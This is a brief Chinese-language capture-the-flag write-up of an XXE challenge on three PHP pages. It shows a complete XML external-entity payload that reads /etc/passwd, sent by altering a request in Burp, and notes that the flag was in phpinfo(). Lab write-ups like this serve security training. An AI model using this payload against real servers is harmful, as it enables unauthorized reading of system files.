题目地址
dom.php、SimpleXMLElement.php、simplexml_load_string.php均可触发XXE漏洞
用burp抓包,在后方修改加入payload
payload:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<root>
<name>&xxe;</name>
</root>
一顿操作下去,发现flag就在phpinfo() 里面